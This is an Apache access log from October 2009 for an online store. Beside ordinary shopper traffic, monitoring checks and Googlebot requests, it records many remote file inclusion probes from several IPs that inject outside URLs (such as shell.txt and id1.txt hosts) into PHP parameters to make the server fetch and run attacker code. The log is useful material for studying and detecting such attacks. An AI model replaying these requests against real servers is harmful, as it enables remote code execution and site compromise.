79.118.8.82 - - [13/Oct/2009:04:24:39 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:39 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:39 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:39 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:39 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:40 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:40 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:40 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:40 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.59.12.99 - - [13/Oct/2009:04:24:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
79.118.8.82 - - [13/Oct/2009:04:24:40 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:41 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:41 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:41 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:41 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:41 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:41 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:41 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:41 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:42 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:42 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:24:45 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
193.200.255.18 - - [13/Oct/2009:04:25:01 -0400] "GET /logs/access_log.Q109080200%20%20//micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
79.118.8.82 - - [13/Oct/2009:04:25:01 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C834518390200175800I+M37+ENG HTTP/1.1" 200 46837 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:25:03 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C834518390200175800I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:25:03 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C834518390200175800I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
193.200.255.18 - - [13/Oct/2009:04:25:17 -0400] "GET /logs/error_log.Q109082100//micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:25:25 -0400] "GET /logs/access_log.Q109080200//micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
79.118.8.82 - - [13/Oct/2009:04:25:32 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C834D1279C20029D800I+M37+ENG HTTP/1.1" 200 76799 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C834518390200175800I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
124.0.54.130 - - [13/Oct/2009:04:25:40 -0400] "GET //include/mail.inc.php?skin_board_path=http://dc.kaya.ac.kr/~architecture/board//skin/zero_cyan/1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:04:25:46 -0400] "GET /logs/error_log.Q109090700%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
124.0.54.130 - - [13/Oct/2009:04:25:46 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://dc.kaya.ac.kr/~architecture/board//skin/zero_cyan/1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
79.118.8.82 - - [13/Oct/2009:04:25:49 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C834A1E9972004AD800I+M37+ENG HTTP/1.1" 200 71818 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C834D1279C20029D800I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.118.8.82 - - [13/Oct/2009:04:25:51 -0400] "GET /images/items/5099001_THUMB.JPG HTTP/1.1" 200 2313 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C834A1E9972004AD800I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
77.242.37.212 - - [13/Oct/2009:04:25:53 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:04:25:54 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 21659 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:25:57 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:25:57 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:25:57 -0400] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:04:26:16 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
174.143.3.188 - - [13/Oct/2009:04:26:16 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
174.143.3.188 - - [13/Oct/2009:04:26:16 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
174.143.3.188 - - [13/Oct/2009:04:26:16 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.249.173.242 - - [13/Oct/2009:04:26:24 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:26:24 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:26:38 -0400] "GET /logs/access_log.Q109061100//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:04:26:46 -0400] "GET /logs/access_log.Q109052400/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:04:26:46 -0400] "GET /////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 200 459 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:04:26:46 -0400] "GET /logs/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 200 21664 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:04:26:46 -0400] "GET /logs/access_log.Q109052400/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:04:26:46 -0400] "GET /logs/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 200 21664 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:04:26:46 -0400] "GET /////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 200 459 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:04:26:47 -0400] "GET /logs/access_log.Q109051700/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:04:26:47 -0400] "GET /logs/access_log.Q109051700/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.203.180.144 - - [13/Oct/2009:04:26:53 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.203.180.144 - - [13/Oct/2009:04:27:06 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.203.180.144 - - [13/Oct/2009:04:27:06 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
203.252.90.80 - - [13/Oct/2009:04:27:53 -0400] "GET //skin/happycast_category_brown/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
203.252.90.80 - - [13/Oct/2009:04:27:53 -0400] "GET /logs//skin/happycast_category_brown/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
203.252.90.80 - - [13/Oct/2009:04:27:55 -0400] "GET /logs/access_log.Q109051200//skin/happycast_category_brown/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.203.180.144 - - [13/Oct/2009:04:28:07 -0400] "GET /logs/access_log.Q109092000//bbs//skin/ggambo7002_board/write.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:28:27 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:28:44 -0400] "GET /logs/error_log.Q109082100//micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:28:55 -0400] "GET /logs/error_log.Q109082100//micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:29:12 -0400] "GET /logs/access_log.Q109080200//micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
193.200.255.18 - - [13/Oct/2009:04:29:24 -0400] "GET /logs/access_log.Q109080200//micro_cms_files/microcms-include.php?microcms_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
203.252.90.80 - - [13/Oct/2009:04:29:30 -0400] "GET /logs//skin/happycast_category_brown/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
203.252.90.80 - - [13/Oct/2009:04:29:30 -0400] "GET /logs/access_log.Q109051200//skin/happycast_category_brown/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
203.252.90.80 - - [13/Oct/2009:04:29:36 -0400] "GET //skin/happycast_category_brown/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:04:29:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.242.37.212 - - [13/Oct/2009:04:30:10 -0400] "GET /logs/access_log.Q109090700%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:04:30:32 -0400] "GET /logs/access_log.Q109052400%20%20/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:04:30:32 -0400] "GET /logs/access_log.Q109051700%20%20/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:04:30:45 -0400] "GET /logs/access_log.Q109052400%20%20/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:04:30:45 -0400] "GET /logs/access_log.Q109051700%20%20/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.210.84.226 - - [13/Oct/2009:04:31:38 -0400] "GET //dm-albums/template/album.php?SECURITY_FILE=http://www.sjobergsbygg.nu/bilder/struktur/eq1.txt????&mode=id HTTP/1.1" 404 227 "-" "-"
222.236.47.182 - - [13/Oct/2009:04:31:57 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shell.malang.co.uk/shell.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
203.252.90.80 - - [13/Oct/2009:04:31:57 -0400] "GET //skin/happycast_category_brown/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
203.252.90.80 - - [13/Oct/2009:04:31:57 -0400] "GET /logs//skin/happycast_category_brown/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
203.252.90.80 - - [13/Oct/2009:04:31:57 -0400] "GET /logs/access_log.Q109051200//skin/happycast_category_brown/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Oct/2009:04:32:04 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shell.malang.co.uk/shell.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
222.236.47.182 - - [13/Oct/2009:04:32:06 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shell.malang.co.uk/shell.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
222.236.47.182 - - [13/Oct/2009:04:32:09 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shell.malang.co.uk/shell.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
77.242.37.212 - - [13/Oct/2009:04:32:49 -0400] "GET /logs/error_log.Q109090500%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:04:32:59 -0400] "GET //appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:04:33:00 -0400] "GET /logs/access_log.Q109051400%20%20//appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:04:33:00 -0400] "GET /logs//appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:04:33:01 -0400] "GET //appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:04:33:02 -0400] "GET /logs//appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:04:33:02 -0400] "GET /logs/access_log.Q109051400%20%20//appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:04:33:11 -0400] "GET //appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:04:33:12 -0400] "GET /logs//appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:04:33:13 -0400] "GET /logs/access_log.Q109051400%20%20//appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.249.68.226 - - [13/Oct/2009:04:33:26 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L118C74421B790200472800G+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.252.90.80 - - [13/Oct/2009:04:33:31 -0400] "GET /logs/access_log.Q109053100//skin/happycast_category_brown/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
66.249.68.91 - - [13/Oct/2009:04:33:36 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L118C74421BE9B2004D2800G+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.226 - - [13/Oct/2009:04:33:47 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L118C74421BC9D200482800G+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.226 - - [13/Oct/2009:04:33:57 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L118C74421B296200452800G+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.236.47.182 - - [13/Oct/2009:04:34:04 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shell.malang.co.uk/shell.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
66.249.68.226 - - [13/Oct/2009:04:34:07 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L118C74421B9972004D2800G+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.91 - - [13/Oct/2009:04:34:18 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L118C74421B494200462800G+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [13/Oct/2009:04:34:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.135.218.37 - - [13/Oct/2009:04:34:42 -0400] "GET /%031/dm-albums/template/album.php?SECURITY_FILE=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
